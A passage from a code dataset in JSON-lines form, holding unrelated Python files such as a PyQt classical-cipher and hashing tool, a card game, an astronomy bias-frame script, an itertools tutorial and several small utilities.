valid\n cipher = ''.join([chr((ord(j) + ord(k[i])) % 26 + ord('A')) for i, j in enumerate(s)])\n return cipher\n\n\n# Debugged. Works Ok.\ndef vigenere_decrypt(s, key): # vigenere cipher decrypt function\n k = key * (len(s) // len(key) + 1) # making key len valid\n dec = ''.join([chr((ord(j) - ord(k[i])) % 26 + ord('A')) for i, j in\n enumerate(s)])\n return dec\n\n\n# Debugged. Works Ok.\ndef fence_create(lst, numrails): # fence functions turns string into railfence view and into list from railfence view\n numrails = int(numrails)\n fence = [[None] * len(lst) for n in range(numrails)]\n # generating fence with the size that is required for the numrails\n rails = list(range(numrails - 1)) + list(range(numrails - 1, 0, -1)) # generating rails\n for n, x in enumerate(lst):\n fence[rails[n % len(rails)]][n] = x # generating railfence table\n return [c for rail in fence for c in rail if c is not None] # making it list\n\n\n# Debugged. Works Ok.\ndef railfence_encode(text, n): # railfence cipher encrypt function\n n = int(n)\n return ''.join(fence_create(text, n))\n\n\n# Debugged. Works Ok.\ndef railfence_decode(text, n): # railfence cipher decrypt function\n n = int(n)\n rng = range(len(text))\n pos = fence_create(rng, n)\n return ''.join(text[pos.index(n)] for n in rng)\n # rail fence decode with key n is the same with fence(rng, n)[pos.index(n)] for n in range(len(text))\n\n\n# Debugged. Works Ok.\ndef scytale_encrypt(plain_text, key): # scytale cipher encrypt function\n key = int(key)\n chars = []\n for c in plain_text:\n if c not in [' ', ',', '.', '?', '!', ':', ';', \"'\"]: # getting only letters from plain_text\n chars.append(c.upper())\n chunks = math.ceil(len(chars) / float(key)) # getting table size\n inters, j = [], 1\n for i in range(2, chunks + 1):\n inters.append(tuple(chars[j - 1:(j + key) - 1]))\n j += key\n\n cipher = []\n for k in range(key): # for k in range rows\n for l in range(chunks): # for j in range columns\n if k >= len(inters[l]):\n cipher.append('+')\n else:\n cipher.append(inters[l][k])\n return ''.join(cipher)\n\n\n# Debugged. Works Ok.\ndef scytale_decrypt(cipher_text, key): # scytale cipher decrypt function\n chars = [c for c in cipher_text]\n chunks = int(math.ceil(len(chars) / float(key))) # getting table size\n inters, j = [], 1\n\n for i in range(2, key + 1):\n inters.append(tuple(chars[j - 1:(j + chunks) - 1]))\n j += chunks\n\n plain = []\n for k in range(chunks): # for k in range columns\n for l in range(len(inters)): # for j in range rows\n plain.append(inters[l][k])\n\n return ''.join(plain)\n\n\n# Debugged. Works Ok.\ndef bin_encrypt(s): # binary cipher encrypt function\n st = s.split()\n ciph = []\n for word in st:\n for letter in word:\n ciph.append(bin(ord(letter))[2:])\n return ' '.join(ciph)\n\n\n# Debugged. Works Ok.\ndef bin_decrypt(s): # binary cipher decrypt function\n st = s.split()\n enc = ''\n for n in st:\n enc += chr(int(n, 2))\n return enc\n\n\n# Debugged. Works Ok.\ndef what_to_do(action, func, s, key):\n actions = {\n 'ReverseE': reversed,\n 'ReverseD': reversed,\n 'BinaryD': bin_decrypt,\n 'BinaryE': bin_encrypt,\n 'hexD': hex_decrypt,\n 'hexE': hex_encrypt,\n 'Base16D': base16_decrypt,\n 'Base16E': base16_encrypt,\n 'Base32E': base32_encrypt,\n 'Base32D': base32_decrypt,\n 'Base64E': base64_encrypt,\n 'Base64D': base64_decrypt,\n 'ROT13E': rot13_encrypt,\n 'ROT13D': rot13_decrypt,\n 'md5 hashE': md5,\n 'sha1 hashE': sha1,\n 'sha224 hashE': sha224,\n 'sha256 hashE': sha256,\n 'sha384 hashE': sha384,\n 'sha512 hashE': sha512,\n 'ScytaleE': scytale_encrypt,\n 'ScytaleD': scytale_decrypt,\n 'CaesarE': caesar_encrypt,\n 'CaesarD': caesar_decrypt,\n 'RailFenceE': railfence_encode,\n 'RailFenceD': railfence_decode,\n 'VigenereD': vigenere_decrypt,\n 'VigenereE': vigenere_encrypt,\n }\n if key is None:\n return actions[func + action.upper()](s)\n else:\n return actions[func + action.upper()](s, key)\n\n\n# Debugged. Works Ok.\nclass CryptoToolMainWindow(QMainWindow, Ui_CryptoTool, QWidget):\n # Debugged. Works Ok.\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setupUi(self)\n self.input, self.output = '', ''\n self.decodeType, self.encodeType, self.key = None, None, None\n self.key_required = [\"Scytale\", \"Caesar\", \"RailFence\", \"Vigenere\"]\n self.decodeButton.clicked.connect(self.run_decode)\n self.encodeButton.clicked.connect(self.run_encode)\n\n # Debugged. Works Ok.\n def run_encode(self):\n action, ok_button_pressed = QInputDialog.getItem(\n self,\n \"Encode\",\n \"Choose encoding type\",\n (\n \"Reverse\", \"Scytale\", \"Binary\", \"hex\", \"Base16\", \"Base32\",\n \"Base64\",\n \"ROT13\", \"Caesar\", \"RailFence\", \"Vigenere\", \"md5 hash\",\n \"sha1 hash\",\n \"sha224 hash\", \"sha256 hash\", \"sha384 hash\", \"sha512 hash\"),\n 1,\n False\n )\n if ok_button_pressed:\n self.encodeType = action\n if self.encodeType not in self.key_required:\n try:\n text = what_to_do(\"e\", self.encodeType, self.Input.text(), None)\n self.Output.setText(text)\n except Exception:\n self.Output.setText(\"-Error-\")\n else:\n self.key_encode()\n\n # Debugged. Works Ok.\n def run_decode(self):\n action, ok_button_pressed = QInputDialog.getItem(\n self,\n \"Decode\",\n \"Choose decoding type\",\n (\n \"Reverse\", \"Scytale\", \"Binary\", \"hex\", \"Base16\", \"Base32\",\n \"Base64\",\n \"ROT13\", \"Caesar\", \"RailFence\", \"Vigenere\"),\n 1,\n False\n )\n if ok_button_pressed:\n self.decodeType = action\n if self.decodeType not in self.key_required:\n try:\n text = what_to_do(\"d\", self.decodeType, self.Input.text(), None)\n self.Output.setText(text)\n except Exception:\n self.Output.setText(\"-Error-\")\n else:\n self.key_decode()\n\n # Debugged. Works Ok.\n def key_encode(self):\n key, ok_button_pressed = QInputDialog.getText(\n self, \"Key\", \"Insert key\"\n )\n if ok_button_pressed:\n self.key = key\n try:\n text = what_to_do(\"e\", self.encodeType, self.Input.text(), self.key)\n self.Output.setText(text)\n except Exception:\n self.Output.setText(\"-Error-\")\n\n # Debugged. Works Ok.\n def key_decode(self):\n key, ok_button_pressed = QInputDialog.getText(\n self, \"Key\", \"Insert key\"\n )\n if ok_button_pressed:\n self.key = key\n try:\n text = what_to_do(\"d\", self.decodeType, self.Input.text(), self.key)\n self.Output.setText(text)\n except Exception:\n self.Output.setText(\"-Error-\")\n\n\n# Debugged. Works Ok.\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n prog = CryptoToolMainWindow()\n prog.show()\n sys.exit(app.exec())\n","sub_path":"CyberSecurityTool-master/CyberSecurityTool-master/CryptoTool/CryptoToolmain.py","file_name":"CryptoToolmain.py","file_ext":"py","file_size_in_byte":11819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"72285244","text":"from player import Player\nfrom board import Board\nfrom deck import Deck\nfrom turn import Turn\n\nclass Game(object):\n\n def __init__(self, numOfPlayers, players = None):\n self.board = Board()\n self.deck = Deck()\n self.numOfPlayers = numOfPlayers\n if players == None:\n self.players = [Player(8 if numOfPlayers == 1 else 7 if numOfPlayers == 2 else 6) for p in range(numOfPlayers)]\n else: self.players = players\n self.turn = None\n self.turnsPlayed = 0\n\n def setup(self):\n self.deck.shuffle()\n self.deck.deal([player.hand for player in self.players])\n self.startTurn(self.players[0])\n\n def playCard(self, player, card, pile = None, pileIndex = None):\n cardFromHand = player.hand.takeCardFromHand(card)\n if(pile): pile.putCardOnPile(cardFromHand)\n if(pileIndex != None): self.board.piles[pileIndex].putCardOnPile(cardFromHand)\n self.turn.cardsPlayed += 1\n\n def startTurn(self, player):\n self.turn = Turn(player)\n\n def endTurn(self):\n if self.turn.canEnd():\n self.turnsPlayed += 1\n self.deck.deal([self.turn.player.hand])\n self.startTurn(self.players[self.turnsPlayed%self.numOfPlayers])","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"526411425","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n# Generated file, DO NOT EDIT\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass ExtensionRequest(Model):\n \"\"\"ExtensionRequest.\n\n :param reject_message: Required message supplied if the request is rejected\n :type reject_message: str\n :param request_date: Date at which the request was made\n :type request_date: datetime\n :param requested_by: Represents the user who made the request\n :type requested_by: :class:`IdentityRef `\n :param request_message: Optional message supplied by the requester justifying the request\n :type request_message: str\n :param request_state: Represents the state of the request\n :type request_state: object\n :param resolve_date: Date at which the request was resolved\n :type resolve_date: datetime\n :param resolved_by: Represents the user who resolved the request\n :type resolved_by: :class:`IdentityRef `\n \"\"\"\n\n _attribute_map = {\n 'reject_message': {'key': 'rejectMessage', 'type': 'str'},\n 'request_date': {'key': 'requestDate', 'type': 'iso-8601'},\n 'requested_by': {'key': 'requestedBy', 'type': 'IdentityRef'},\n 'request_message': {'key': 'requestMessage', 'type': 'str'},\n 'request_state': {'key': 'requestState', 'type': 'object'},\n 'resolve_date': {'key': 'resolveDate', 'type': 'iso-8601'},\n 'resolved_by': {'key': 'resolvedBy', 'type': 'IdentityRef'}\n }\n\n def __init__(self, reject_message=None, request_date=None, requested_by=None, request_message=None, request_state=None, resolve_date=None, resolved_by=None):\n super(ExtensionRequest, self).__init__()\n self.reject_message = reject_message\n self.request_date = request_date\n self.requested_by = requested_by\n self.request_message = request_message\n self.request_state = request_state\n self.resolve_date = resolve_date\n self.resolved_by = resolved_by\n","sub_path":"vsts/vsts/extension_management/v4_0/models/extension_request.py","file_name":"extension_request.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"483729232","text":"#!/usr/bin/env python2\n# -*- coding: UTF-8 -*-\n# ---------------------------------------------------------------------------\n# ___ __ __ __ ___\n# / | \\ | \\ | \\ / Automatic\n# \\__ |__/ |__/ |___| \\__ Annotation\n# \\ | | | | \\ of\n# ___/ | | | | ___/ Speech\n# =============================\n#\n# http://www.lpl-aix.fr/~bigi/sppas\n#\n# ---------------------------------------------------------------------------\n# developed at:\n#\n# Laboratoire Parole et Langage\n#\n# Copyright (C) 2011-2014 Brigitte Bigi\n#\n# Use of this software is governed by the GPL, v3\n# This banner notice must not be removed\n# ---------------------------------------------------------------------------\n#\n# SPPAS is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# SPPAS is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with SPPAS. If not, see .\n#\n# ----------------------------------------------------------------------------\n# File: sndroamer.py\n# ----------------------------------------------------------------------------\n\n__docformat__ = \"\"\"epytext\"\"\"\n__authors___ = \"\"\"Brigitte Bigi (brigitte.bigi@gmail.com)\"\"\"\n__copyright__ = \"\"\"Copyright (C) 2011-2014 Brigitte Bigi\"\"\"\n\n\n# ---------------------------------------------------------------------------\n# Imports\n# ---------------------------------------------------------------------------\n\nimport sys\nimport os\nimport os.path\nfrom argparse import ArgumentParser\nimport tkMessageBox\n\n\n# VERIFY PYTHON\n# -------------\nif sys.version_info < (2, 7):\n tkMessageBox.showwarning(\n \"Python Error...\",\n \"Your python version is too old. SndRoamer requires 2.7\\n. Verify your python installation and try again.\"\n )\n sys.exit(1)\n\nif sys.version_info >= (3, 0):\n tkMessageBox.showwarning(\n \"Python Error...\",\n \"Your python version is not appropriate. SndRoamer requires 2.7\\n. Verify your python installation and try again.\"\n )\n sys.exit(1)\n\n\n# VERIFY WXPYTHON\n# ----------------\n\ntry:\n import wx\nexcept ImportError:\n import tkMessageBox\n tkMessageBox.showwarning(\n \"WxPython Error...\",\n \"WxPython is not installed on your system.\\n. Verify your installation and try again.\"\n )\n sys.exit(1)\n\n# THEN, VERIFY SPPAS\n# ------------------\n\n# Make sure that we can import libraries\nPROGRAM = os.path.abspath(__file__)\nSPPAS = os.path.join(os.path.dirname( os.path.dirname( PROGRAM ) ), \"src\")\nsys.path.insert(0,SPPAS)\n\ntry:\n from wxgui.frames.sndroamerframe import SndRoamerFrame\n from wxgui.sp_icons import SNDROAMER_APP_ICON\n from utils.commons import setup_logging\nexcept ImportError as e:\n import tkMessageBox\n tkMessageBox.showwarning(\n \"Error...\",\n \"A problem occurred.\\nVerify your installation and try again.\\n\\nThe system error message is: %s\" % str(e)\n )\n sys.exit(1)\n\n\n# ---------------------------------------------------------------------------\n# Main application\n# ---------------------------------------------------------------------------\n\n# Log\nlog_level = 1\nlog_file = None\nsetup_logging(log_level, log_file)\n\n\n# Arguments\n# ------------------------------------------------------------------------\n\nparser = ArgumentParser(usage=\"%s files\" % os.path.basename(PROGRAM), description=\"SndRoamer graphical user interface.\")\nparser.add_argument(\"files\", nargs=\"*\", help='Input file name(s)')\nargs = parser.parse_args()\n\n# force to add path\nfilenames = []\nfor f in args.files:\n p,b = os.path.split( f )\n if not p:\n p = os.getcwd()\n filenames.append( os.path.abspath(os.path.join(p,b) ))\n\n\n# App\narguments = {}\narguments['files'] = []\narguments['title'] = \"SndRoamer\"\narguments['type'] = \"SOUNDFILES\"\narguments['icon'] = SNDROAMER_APP_ICON\n\napp = wx.App()\nframe = SndRoamerFrame(None, -1, arguments)\napp.SetTopWindow(frame)\n\nframe.AddFiles( filenames )\n\napp.MainLoop()\n\n# ---------------------------------------------------------------------------\n","sub_path":"sppas/bin/sndroamer.py","file_name":"sndroamer.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"43232552","text":"#!/usr/bin/env python\n\n\"\"\" NOT_Bias - Function to create bias for NOT polarimetric data\n v1.0: 2018-10-02, mdevogele@lowell.edu\n\"\"\"\n\nimport argparse\n\nimport numpy as np\n\nfrom astropy.io import fits\n\n\n#def Median(Bias):\n# Master = np.median(Bias,axis=0)\n# print('Computed median')\n# return Master\n#\n#def Mean(Bias):\n# Master = np.mean(Bias,axis=0)\n# print('Computed mean') \n# return Master\n\n\ndef rebin(arr, new_shape):\n \"\"\"Rebin 2D array arr to shape new_shape by averaging.\"\"\"\n shape = (new_shape[0], arr.shape[0] // new_shape[0],\n new_shape[1], arr.shape[1] // new_shape[1])\n return arr.reshape(shape).mean(-1).mean(1)\n\n\nclass Result(object):\n def Indiv_to_Master(self, method, Bias):\n Master = getattr(self, method, lambda x: getattr(self, 'Default')(Bias))(Bias)\n # Call the method as we return it\n return Master\n \n def Median(self,Bias):\n Master = np.median(Bias,axis=0)\n return Master\n \n def Mean(self,Bias):\n Master = np.mean(Bias,axis=0)\n return Master\n\n def Default(self, Bias):\n Master = np.median(Bias,axis=0)\n print(\"Invalid method, use of the median as default\")\n return Master \n\n\ndef Create_Bias(filenames,MasterName,Verbose,Method,Bin):\n \n \n if Verbose:\n print('Beginning bias processing')\n print('Processing files:')\n print('index \\t filename')\n for idx,elem in enumerate(filenames):\n print('{} \\t {}'.format(idx+1,elem))\n print('Creating the master bias')\n \n \n Bias = []\n for image in filenames:\n hdulist = fits.open(image)\n data = hdulist[1].data\n data = rebin(np.shape(data)[0]/Bin,np.shape(data)[1]/Bin)\n Bias.append(data)\n \n Res = Result()\n MasterBias = Res.Indiv_to_Master(Method, Bias)\n \n # Cropping the data to avoid the vignetting in science frames \n hdulist[1].data = MasterBias[100:300,100:300]\n\n hdulist.writeto(MasterName, overwrite = True)\n hdulist.close() \n \n\n if Verbose:\n print('Master bias save to {}'.format(MasterName))\n hdulist = fits.open(MasterName)\n data = hdulist[1].data\n print('Statistics of the Master bias')\n print('Mean: {} \\t Median: {} \\t std: {}'.format(np.mean(data), np.median(data), np.std(data)))\n print('End of bias processing')\n hdulist.close()\n \n \n\n\n\n\nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser(description='Processing and creation of master bias')\n parser.add_argument('-v',\n help='Increase verbosity',\n action=\"store_true\") \n parser.add_argument('-o',\n help='Name of the master bias file',\n default='MasterBias.fits')\n parser.add_argument('-m',\n help='Method to use to compute the master bias: Mean, Median',\n default='Median') \n \n parser.add_argument('-bin',\n help='Binning factor',\n default=1) \n parser.add_argument('images', help='images to process or \\'all\\'',\n nargs='+')\n\n args = parser.parse_args()\n\n Verbose = args.v\n MasterName = args.o\n filenames = args.images \n Method = args.m \n Bin = int(args.bin) \n\n Create_Bias(filenames,MasterName,Verbose,Method,Bin)\n pass","sub_path":"NOT_Bias.py","file_name":"NOT_Bias.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"559336712","text":"from eden.util import fit_estimator as eden_fit_estimator\nimport numpy\nfrom sklearn.calibration import CalibratedClassifierCV\nfrom scipy.sparse import vstack\nfrom sklearn.linear_model import SGDClassifier\nimport random\n\n\nclass EstimatorWrapper:\n\n '''\n graphlearn will edata_matrixpect fit to return an estimator that is used in the graphlearn\n (if you use sampler.fit)\n '''\n\n def fit(self, graphs, vectorizer=None, nu=.5, cv=2, n_jobs=-1, random_state=None):\n if random_state is not None:\n random.seed(random_state)\n data_matrix = vectorizer.fit_transform(graphs)\n self.estimator = self.fit_estimator(data_matrix, n_jobs=n_jobs, cv=cv, random_state=random_state)\n cal_estimator = self.calibrate_estimator(data_matrix, estimator=self.estimator, nu=nu, cv=cv)\n return cal_estimator\n\n def fit_2(self, pos_iterator, neg_iterator, vectorizer=None, cv=2, n_jobs=-1):\n \"\"\"\n This is used in the discsampler .,., i am not sure why i am not using eden directly.\n I will fix this when i look into the disk sampler next time.\n :param pos_iterator:\n :param neg_iterator:\n :param vectorizer:\n :param cv:\n :param n_jobs:\n :return:\n \"\"\"\n\n data_matrix = vectorizer.fit_transform(pos_iterator)\n neagtive_data_matrix = vectorizer.transform(neg_iterator)\n estimator = eden_fit_estimator(SGDClassifier(loss='log'),\n positive_data_matrix=data_matrix,\n negative_data_matrix=neagtive_data_matrix,\n cv=cv,\n n_jobs=n_jobs,\n n_iter_search=10)\n # esti= CalibratedClassifierCV(estimator,cv=cv,method='sigmoid')\n # esti.fit( vstack[ X,Y], numpy.asarray([1]*X.shape[0] + [0]*Y.shape[0]))\n return estimator\n\n def fit_estimator(self, data_matrix, n_jobs=-1, cv=2, random_state=42):\n '''\n create self.estimator...\n by inversing the data_matrix set to get a negative set\n and then using edens fit_estimator\n '''\n # create negative set:\n data_matrix_neg = data_matrix.multiply(-1)\n # i hope loss is log.. not 100% sure..\n # probably calibration will fix this#\n return eden_fit_estimator(SGDClassifier(loss='log'), positive_data_matrix=data_matrix,\n negative_data_matrix=data_matrix_neg,\n cv=cv,\n n_jobs=n_jobs,\n n_iter_search=10,\n random_state=random_state)\n\n def calibrate_estimator(self, data_matrix, estimator=None, nu=.5, cv=2):\n '''\n move bias until nu of data_matrix are in the negative class\n then use scikits calibrate to calibrate self.estimator around the input\n '''\n # move bias\n l = [(estimator.decision_function(g)[0], g) for g in data_matrix]\n l.sort(key=lambda x: x[0])\n element = int(len(l) * nu)\n estimator.intercept_ -= l[element][0]\n\n # calibrate\n data_matrix_binary = vstack([a[1] for a in l])\n data_y = numpy.asarray([0] * element + [1] * (len(l) - element))\n estimator = CalibratedClassifierCV(estimator, cv=cv, method='sigmoid')\n estimator.fit(data_matrix_binary, data_y)\n\n return estimator\n","sub_path":"graphlearn/estimatorwrapper.py","file_name":"estimatorwrapper.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"297627167","text":"# Copyright 2020 The Cobalt Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Starboard Linux x64x11 Clang 3.9 Cobalt configuration.\"\"\"\n\nfrom starboard.linux.shared.cobalt import configuration as shared_configuration\nfrom starboard.tools.testing import test_filter\n\n\nclass CobaltLinuxX64X11Clang39Configuration(\n shared_configuration.CobaltLinuxConfiguration):\n \"\"\"Starboard Linux x64x11 Clang 3.9 Cobalt configuration.\"\"\"\n\n def GetTestFilters(self):\n filters = super().GetTestFilters()\n for target, tests in self.__FILTERED_TESTS.items():\n filters.extend(test_filter.TestFilter(target, test) for test in tests)\n return filters\n\n # A map of failing or crashing tests per target.\n __FILTERED_TESTS = { # pylint: disable=invalid-name\n 'zip_unittests': [\n 'ZipReaderTest.ExtractToFileAsync_RegularFile',\n ],\n # Tracked by b/226999079.\n 'renderer_test': [\n 'LottieCoveragePixelTest*skottie_linear_wipe_effect_json',\n 'LottieCoveragePixelTest*skottie_matte_blendmode_json',\n 'LottieCoveragePixelTest*skottie_shift_channels_effect_json',\n 'LottieCoveragePixelTest*skottie_3d_2planes_json',\n 'LottieCoveragePixelTest*skottie_venetianblinds_effect_json',\n ],\n }\n","sub_path":"starboard/linux/x64x11/clang/3.9/cobalt/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"187504902","text":"import pandas as pd\n\nfrom survive_label_prediction.config.resource import Resource\n\n\ndef load_csv():\n # storage_path = Path(__file__).parents[2] / \"survive_label_prediction\" / \"storage\"\n # storage_path = Path(__file__).parents[1] / \"storage\"\n #\n # train_csv_path = storage_path / \"train.csv\"\n # test_csv_path = storage_path / \"train.csv\"\n\n # train = pd.read_csv(train_csv_path)\n # test = pd.read_csv(test_csv_path)\n\n r = Resource()\n train_csv_path = r.storage_path / \"train.csv\"\n test_csv_path = r.storage_path / \"test.csv\"\n\n train = pd.read_csv(train_csv_path)\n test = pd.read_csv(test_csv_path)\n\n return train, test\n\n\nif __name__ == \"__main__\":\n print(load_csv())\n","sub_path":"survive_label_prediction/controllers/load_csv.py","file_name":"load_csv.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"523786767","text":"import itertools\n\n# COUNT\ncounter = itertools.count()\n\nfor _ in range(10):\n print(next(counter)) # Prints numbers from 0 through 9\n\nmy_counter = itertools.count(start=5, step=5) # It can take negative value for step argument\n\nfor _ in range(10):\n print(next(my_counter))\n\nnames = ['apple', 'microsoft', 'google', 'yahoo']\n\nname_id = zip(itertools.count(), names)\n\nfor item in name_id:\n print(item)\n\n# ================================================================\n# CYCLE\nstates = ['ON', 'OFF']\n\ncc = itertools.cycle(states)\n\nfor _ in range(5):\n print(next(cc))\n\n# ================================================================\n# REPEAT\nr_2 = itertools.repeat(2)\n\n# Prints 2 infinitely\nfor item in r_2:\n print(item)\n\nr_2 = itertools.repeat(2, times=5)\n\n# Prints 2, 5 times\nfor item in r_2:\n print(item)\n\n# Prints string 'hello' 10 times\nr_hello = itertools.repeat('hello', times=10)\nfor item in r_hello:\n print(item)\n\n# ================================================================\n# COMBINATION\nletters = ['a', 'b', 'c']\nmy_comb = itertools.combinations(letters, 2)\n\nfor item in my_comb:\n print(item)\n\nvowel_comb = itertools.combinations(\"aeiou\", 2)\n\nfor item in vowel_comb:\n print(item)\n\n# ================================================================\n# PERMUTATION\nmy_permutation = itertools.permutations(letters)\n# The above code Prints\n# ('a', 'b', 'c')\n# ('a', 'c', 'b')\n# ('b', 'a', 'c')\n# ('b', 'c', 'a')\n# ('c', 'a', 'b')\n# ('c', 'b', 'a')\n\nmy_permutation = itertools.permutations(letters, 2)\n\n# The above code prints\n# ('a', 'b')\n# ('a', 'c')\n# ('b', 'a')\n# ('b', 'c')\n# ('c', 'a')\n# ('c', 'b')\n\nfor item in my_permutation:\n print(item)\n\n# ================================================================\n# iSlice\n\nnames = ['apple', 'google', 'yahoo', 'flikpart', 'netflix', 'gmail']\n\nmy_slice = itertools.islice(names, 2, 5)\n\nfor item in my_slice:\n print(item)\n\nfor item in itertools.islice(names, 2, None):\n print(item)\n# None is used to indicate everything beyond index 2 (item[2:])\n\nfor item in itertools.islice(names, None, 3):\n print(item)\n# start upto index 3 but not including index 3 (item[:3])\n\n# Reading first 5 lines of the file\nwith open('read.txt', 'r') as f:\n lines = itertools.islice(f, 5, None)\n for line in lines:\n print(line, end='')\n# ================================================================\n\n# ================================================================\n# chain\na = [1, 2, 3]\nb = [4, 5, 6]\nc = [7, 8, 9]\n\n# Merges all 3 list's and returns an iterator object\nd = itertools.chain(a, b, c)\n\n\n# GroupBy\n# ================================================================\nportfolio = [\n {'name': 'AA', 'shares': 100, 'date': '25/06/2010'},\n {'name': 'FB', 'shares': 110, 'date': '23/09/2010'},\n {'name': 'IBM', 'shares': 90, 'date': '26/07/2010'},\n {'name': 'FB', 'shares': 240, 'date': '23/09/2010'},\n {'name': 'FB', 'shares': 210, 'date': '26/06/2010'},\n {'name': 'FB', 'shares': 109, 'date': '24/06/2010'},\n {'name': 'IBM', 'shares': 80, 'date': '24/06/2010'},\n {'name': 'AAPL', 'shares': 110, 'date': '25/06/2010'}\n]\n\n# Sort the list based on date\nportfolio.sort(key=lambda item: item['date'])\n# Groupby Date\nfor name, item in itertools.groupby(portfolio, key=lambda item: item['date']):\n print(name)\n for it in item:\n print(it)\n\n# Sort the list based on Name\nportfolio.sort(key=lambda item: item['name'])\n# Groupby Shares Name\nfor name, item in itertools.groupby(portfolio, key=lambda item: item['name']):\n print(name)\n for it in item:\n print(it)\n\n# zip_longest\n# =======================================================================\na = [1, 2, 3]\nb = [4, 5, 6, 7, 8]\n\nz = itertools.zip_longest(a, b)\n\nprint(list(z)) # Prints [(1, 4), (2, 5), (3, 6), (None, 7), (None, 8)]\n\nz = itertools.zip_longest(a, b, fillvalue=\"NA\")\nprint(list(z)) # Prints [(1, 4), (2, 5), (3, 6), (NA, 7), (NA, 8)]\n\n# takewhile\n# =======================================================================\nt = itertools.takewhile(lambda item: item in 'aeiou', 'ear')\nprint(list(t)) # ['e', 'a']\n\n# Iterating through varying records\nprices = [\n ['GOOG', 490.1, 485.25, 487.5],\n ['IBM', 91.5],\n ['HPE', 13.75, 12.1, 13.25, 14.2, 13.5],\n ['GE', 52.5, 51.2]\n]\n\nfor name, *values in prices:\n print(name, values)\n","sub_path":"14_Misc_Topics/_itertools_module.py","file_name":"_itertools_module.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"86214796","text":"\"\"\"\nPlayground to test the API.\n\"\"\"\n\nfrom emjay import Tracer, Settings\nfrom emjay.writers import LogWriter\n\nimport logging\n\nSettings.default_writer = LogWriter\n\ntracer = Tracer.create()\ntracer.writer.logger.setLevel(logging.DEBUG)\ntracer.writer.logger.addHandler(logging.StreamHandler())\n\n@tracer.trace_function\ndef bar():\n \"\"\"\n Bar\n \"\"\"\n tracer.trace_msg(\"Horray\")\n\n\n@tracer.trace_function\ndef foo(a, b):\n \"\"\"\n Foo\n \"\"\"\n tracer.trace_str(a=a)\n tracer.trace_str(b=b)\n tracer.trace_msg(\"%s %s\", a, b)\n bar()\n\nclass TestClass(object):\n\n @tracer.trace_method\n def foo(self):\n \"\"\"\n Test.foo\n \"\"\"\n tracer.trace_msg(\"Foo!\")\n\n\nfoo(\"Hello\", \"World\")\n\ntest = TestClass()\ntest.foo()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"408852493","text":"#!/usr/bin/env python\n\nimport sys\nfrom make2scons.makefileparser import MakefileParser\nfrom make2scons.makefilereader import MakefileReader\n\n\ndef main():\n if len(sys.argv) < 3 or len(sys.argv) > 3:\n print(\"make2scons \")\n exit(1)\n infile = sys.argv[1]\n outfile = sys.argv[2]\n reader = MakefileReader(infile)\n reader.read()\n\n parser = MakefileParser(reader.makefilestr, infile, outfile)\n parser.run()\n parser.write()\n print(\"Done\")\n\n\nmain()\n","sub_path":"make2scons/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"102508174","text":"# Queue\n# cf. Stack #10828\n\nqueue = []\nfor _ in range(int(input())):\n op = input().split() # operator, operand\n if op[0] == 'push':\n queue.append(op[1])\n elif op[0] == 'pop':\n try:\n print(queue.pop(0))\n except IndexError as e:\n print(-1)\n elif op[0] == 'size':\n print(len(queue))\n elif op[0] == 'empty':\n if len(queue) == 0:\n print(1)\n else:\n print(0)\n elif op[0] == 'front':\n if len(queue) != 0:\n print(queue[0])\n else:\n print(-1)\n elif op[0] == 'back':\n if len(queue) != 0:\n print(queue[-1])\n else:\n print(-1)\n","sub_path":"scripts/10845.py","file_name":"10845.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"452227931","text":"\"\"\"Argux REST client for Argux Server.\"\"\"\n\nimport json\nimport requests\n\nfrom requests.exceptions import (\n ConnectionError,\n 